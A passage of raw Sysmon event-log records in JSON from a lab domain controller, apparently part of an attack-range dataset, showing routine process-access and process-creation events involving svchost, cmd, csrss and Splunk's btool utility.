07:55:34.407","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3516,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.407\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.407","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3517,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.407\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.407","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3518,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.423\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF6-5F25-0000-0010BC820500}\r\nTargetProcessId: 748\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.423","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF6-5F25-0000-0010BC820500}","TargetProcessId":"748","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3519,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.426\r\nProcessGuid: {41C8662E-1FF6-5F25-0000-001072830500}\r\nProcessId: 880\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: btool  server list replication_port --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {41C8662E-1FF6-5F25-0000-0010BC820500}\r\nParentProcessId: 748\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list replication_port --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.426","ProcessGuid":"{41C8662E-1FF6-5F25-0000-001072830500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"btool  server list replication_port --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{41C8662E-1FF6-5F25-0000-0010BC820500}","ParentProcessId":"748","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list replication_port --no-log","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3520,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.423\r\nSourceProcessGUID: {41C8662E-1FF6-5F25-0000-0010BC820500}\r\nSourceProcessId: 748\r\nSourceThreadId: 4896\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {41C8662E-1FF6-5F25-0000-001072830500}\r\nTargetProcessId: 880\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.423","SourceProcessGUID":"{41C8662E-1FF6-5F25-0000-0010BC820500}","SourceProcessId":"748","SourceThreadId":"4896","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{41C8662E-1FF6-5F25-0000-001072830500}","TargetProcessId":"880","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3521,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.423\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF6-5F25-0000-001072830500}\r\nTargetProcessId: 880\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.423","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF6-5F25-0000-001072830500}","TargetProcessId":"880","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3522,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.423\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.423","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3523,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.423\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.423","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3524,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.423\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.423","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+